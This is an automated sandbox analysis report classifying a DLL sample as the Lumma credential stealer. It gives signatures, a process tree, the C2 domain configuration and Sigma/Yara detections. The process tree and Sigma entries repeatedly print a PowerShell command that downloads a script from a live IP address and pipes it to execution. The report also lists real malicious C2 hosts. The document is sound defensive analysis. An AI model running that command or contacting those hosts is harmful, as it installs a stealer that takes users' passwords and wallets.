Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iviewers.dll

Overview

General Information

Sample name:iviewers.dll
Analysis ID:1580147
MD5:021b791221db8fd3d93875f0a38ba5ef
SHA1:505389236008ff05d84ef543566355aca2b3eb61
SHA256:480d586ae595a2f7a47c20aee500758b03a596837b073ede049920d50fb24a05
Tags:dlluser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Sigma detected: PowerShell Download and Execution Cradles
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 7652 cmdline: loaddll32.exe "C:\Users\user\Desktop\iviewers.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7700 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7744 cmdline: rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • csc.exe (PID: 7364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • conhost.exe (PID: 4608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cvtres.exe (PID: 7060 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6C65.tmp" "c:\Users\user\AppData\Local\Temp\shgzzqqc\CSC104EE36483A04EF7B85B7643AE3701F.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • powershell.exe (PID: 5656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • csc.exe (PID: 3700 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
            • cvtres.exe (PID: 1280 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES83D5.tmp" "c:\Users\user\AppData\Local\Temp\pejlabp5\CSCDF701219C1C48818E6CA425D3E8BAB7.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
          • RegAsm.exe (PID: 4132 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • regsvr32.exe (PID: 7720 cmdline: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • csc.exe (PID: 7892 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cvtres.exe (PID: 7956 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES61E6.tmp" "c:\Users\user\AppData\Local\Temp\snjgawjs\CSC3AE61AA7D3846E6BE99F6A92C13265.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • powershell.exe (PID: 8068 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • csc.exe (PID: 3228 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 1036 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7C53.tmp" "c:\Users\user\AppData\Local\Temp\ljtzeyvh\CSC85D6A8B45C74774986DA7C6AC7246BE.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • RegAsm.exe (PID: 2080 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 2288 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • rundll32.exe (PID: 7736 cmdline: rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer MD5: 889B99C52A60DD49227C5E485A016679)
      • csc.exe (PID: 7972 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cvtres.exe (PID: 8048 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES63AB.tmp" "c:\Users\user\AppData\Local\Temp\zhytdsxg\CSC3C5171C2F0D346F28B74AD359FA9163B.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • powershell.exe (PID: 7228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • csc.exe (PID: 5508 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 1568 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7CE0.tmp" "c:\Users\user\AppData\Local\Temp\tkky4heb\CSC9A9BD2EDD89B4875B92A5CEF8AA9766.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • RegAsm.exe (PID: 4152 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • csc.exe (PID: 7576 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • cvtres.exe (PID: 6052 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7946.tmp" "c:\Users\user\AppData\Local\Temp\ceo01y5g\CSC7CE9657BAB74596AF1C43C93161D.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • powershell.exe (PID: 3352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 4640 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 4568 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9337.tmp" "c:\Users\user\AppData\Local\Temp\rcv5n2si\CSC2F361128F45F4F0A9752D6455878CB1F.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • RegAsm.exe (PID: 4936 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 3800 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 4352 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rapeflowwj.lat", "crosshuaht.lat", "volcanoyev.click", "energyaffai.lat", "aspecteirs.lat", "necklacebudi.lat", "grannyejh.lat", "sustainskelet.lat", "discokeyus.lat"], "Build id": "VC6Dfm--Loader2"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: powershell.exe PID: 8068JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        Process Memory Space: powershell.exe PID: 8068INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x73500:$b2: ::FromBase64String(
        • 0x7353c:$b2: ::FromBase64String(
        • 0x73578:$b2: ::FromBase64String(
        • 0xdb632:$b2: ::FromBase64String(
        • 0xdb66e:$b2: ::FromBase64String(
        • 0xdb6aa:$b2: ::FromBase64String(
        • 0xdde16:$b2: ::FromBase64String(
        • 0xdde52:$b2: ::FromBase64String(
        • 0xdde8e:$b2: ::FromBase64String(
        • 0x10df92:$b2: ::FromBase64String(
        • 0x10dfce:$b2: ::FromBase64String(
        • 0x10e00a:$b2: ::FromBase64String(
        • 0xb25a:$s1: -join
        • 0xd5ac:$s1: -join
        • 0x5eb36:$s1: -join
        • 0x816c3:$s1: -join
        • 0x8e798:$s1: -join
        • 0x91b6a:$s1: -join
        • 0x9221c:$s1: -join
        • 0x93d0d:$s1: -join
        • 0x95f13:$s1: -join
        Process Memory Space: powershell.exe PID: 7228JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          Process Memory Space: powershell.exe PID: 7228INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0x33baf:$b2: ::FromBase64String(
          • 0x33beb:$b2: ::FromBase64String(
          • 0x33c27:$b2: ::FromBase64String(
          • 0x4178e:$b2: ::FromBase64String(
          • 0x417ca:$b2: ::FromBase64String(
          • 0x41806:$b2: ::FromBase64String(
          • 0xbd5af:$b2: ::FromBase64String(
          • 0xbd5eb:$b2: ::FromBase64String(
          • 0xbd627:$b2: ::FromBase64String(
          • 0xdf0e0:$s1: -join
          • 0xed629:$s1: -join
          • 0xfa0ab:$s1: -join
          • 0x10b95c:$s1: -join
          • 0x10c10e:$s1: -join
          • 0x19002f:$s1: -join
          • 0x19d104:$s1: -join
          • 0x1a04d6:$s1: -join
          • 0x1a0b88:$s1: -join
          • 0x1a2679:$s1: -join
          • 0x1a487f:$s1: -join
          • 0x1a50a6:$s1: -join
          Process Memory Space: powershell.exe PID: 5656JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Click to see the 5 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Potentially Suspicious Child Process Of Regsvr32
            Source: Process startedAuthor: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 8068, ProcessName: powershell.exe
            Sigma detected: PowerShell Download and Execution Cradles
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 8068, ProcessName: powershell.exe
            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline", ProcessId: 7892, ProcessName: csc.exe
            Sigma detected: PowerShell Web Download
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 8068, ProcessName: powershell.exe
            Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 8068, ProcessName: powershell.exe
            Sigma detected: Usage Of Web Request Commands And Cmdlets
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 8068, ProcessName: powershell.exe
            Sigma detected: Dynamic CSharp Compile Artefact
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\loaddll32.exe, ProcessId: 7652, TargetFilename: C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 8068, ProcessName: powershell.exe

            Data Obfuscation

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious location
